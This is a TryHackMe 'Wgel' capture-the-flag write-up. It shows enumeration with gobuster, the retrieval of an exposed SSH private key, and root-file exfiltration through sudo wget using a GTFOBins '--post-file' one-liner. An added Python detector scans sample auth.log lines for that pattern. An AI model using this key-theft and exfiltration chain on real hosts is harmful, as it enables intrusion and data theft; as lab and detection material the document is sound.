THM - Wgel
Can you exfiltrate the root flag?
Dunno, but since this is an easy-rated box I'll give myself a fighting chance. Let's begin.
nmap says we’ve got 22 (SSH) and 80 (HTTP) only.
The homepage for the website is just the Apache default page, with one exception - a comment for Jessie. So perhaps that’s our username.
Gobuster is a place to start:
root@kali:/opt/tryhackme/wgel# gobuster dir -u http://10.10.34.196 -w /usr/share/wordlists/dirb/common.txt
This turns up one interesting directory - sitemap. Checking that, we get a whole host of pages; basically an incomplete blog/business site. It's called unapp, but that doesn't turn up anything on searchsploit, so let's run gobuster against the sitemap directory:
root@kali:/opt/tryhackme/wgel# gobuster dir -u http://10.10.34.196/sitemap -w /usr/share/wordlists/dirb/common.txt
Doing that, we find .ssh/id_rsa. Bingo.
Once we've downloaded the SSH key, we can chmod 600 it and then log in:
root@kali:/opt/tryhackme/wgel# ssh -i id_rsa email@example.com
Then we run sudo -l:
Jessie has got the user flag, and we can run wget as root. What can we do with that? Well, the box hint was about exfiltrating the root flag.
GTFOBins says we can exfiltrate files:
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use --post-data to send hard-coded data.
wget --post-file=$LFILE $URL
So let’s try that:
And on the receiving end I used netcat:
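Seen from the defending side, the sudo step above is noisy: sudo writes the full command line it elevates to /var/log/auth.log, so a root-level wget with --post-file stands out. The Python below is an added example, not part of the original writeup or the box: it scans a handful of constructed auth.log lines (the hostname, the 10.0.0.5 address and the /root/root.txt path are placeholders I made up, not values from the box) for sudo-elevated wget invocations whose arguments send a local file or string in the request body, which is exactly the GTFOBins primitive used above, and reports who ran it, what was posted and where it went.

```python
"""Flag sudo-elevated wget invocations that post local content somewhere.

Added example for the writeup; the log lines are constructed, not box output.
"""
import os
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample lines in the format sudo/syslog write to /var/log/auth.log
# on Debian/Ubuntu. Hostname, IP address and file path are placeholders.
SAMPLE_AUTH_LOG = """\
Mar  3 10:41:02 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=list
Mar  3 10:41:30 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget --post-file=/root/root.txt http://10.0.0.5:4444/
Mar  3 10:42:00 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget -q https://archive.example.org/package.deb
Mar  3 10:42:10 wgel sshd[1201]: Accepted publickey for jessie from 10.0.0.5 port 50122 ssh2
"""

# Standard sudo log line: "<user> : TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<argv>"
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# GNU wget options that put local content into the request body.
UPLOAD_OPTS = ("--post-file", "--post-data", "--body-file", "--body-data")


@dataclass
class ExfilAlert:
    user: str            # account that invoked sudo
    runas: str           # account the command ran as (root in the writeup)
    option: str          # which upload option was used
    value: str           # the file path or literal data handed to it
    url: Optional[str]   # destination URL, if one was on the command line
    raw: str             # the original log line, for the ticket


def _upload_option(argv: List[str]) -> Optional[Tuple[str, str]]:
    """Return (option, value) for the first upload-style option, else None.

    Handles both "--post-file=/path" and "--post-file /path" spellings.
    """
    for i, arg in enumerate(argv):
        for opt in UPLOAD_OPTS:
            if arg == opt and i + 1 < len(argv):
                return opt, argv[i + 1]
            if arg.startswith(opt + "="):
                return opt, arg[len(opt) + 1:]
    return None


def _url(argv: List[str]) -> Optional[str]:
    """First argument that looks like a URL wget would fetch or post to."""
    for arg in argv:
        if arg.startswith(("http://", "https://", "ftp://")):
            return arg
    return None


def find_wget_exfil(log_text: str) -> List[ExfilAlert]:
    """Scan auth.log text for sudo-elevated wget runs that upload local content."""
    alerts: List[ExfilAlert] = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m:
            continue  # not a sudo command record (e.g. sshd lines, "list")
        try:
            argv = shlex.split(m.group("cmd"))
        except ValueError:
            continue  # unbalanced quoting; nothing we can parse as argv
        if not argv or os.path.basename(argv[0]) != "wget":
            continue
        hit = _upload_option(argv[1:])
        if hit is None:
            continue  # ordinary download, not an upload
        opt, value = hit
        alerts.append(ExfilAlert(m.group("user"), m.group("runas"),
                                 opt, value, _url(argv[1:]), line))
    return alerts


if __name__ == "__main__":
    for a in find_wget_exfil(SAMPLE_AUTH_LOG):
        print(f"{a.user} ran wget as {a.runas}: {a.option}={a.value} -> {a.url}")
```

The same regex works on real auth.log output because sudo's record format is fixed; point find_wget_exfil at the file contents instead of SAMPLE_AUTH_LOG. The plain download on the third sample line is deliberately not flagged, so the rule only fires on the upload options, which is the part of wget a sudoers entry should never hand to a non-root user.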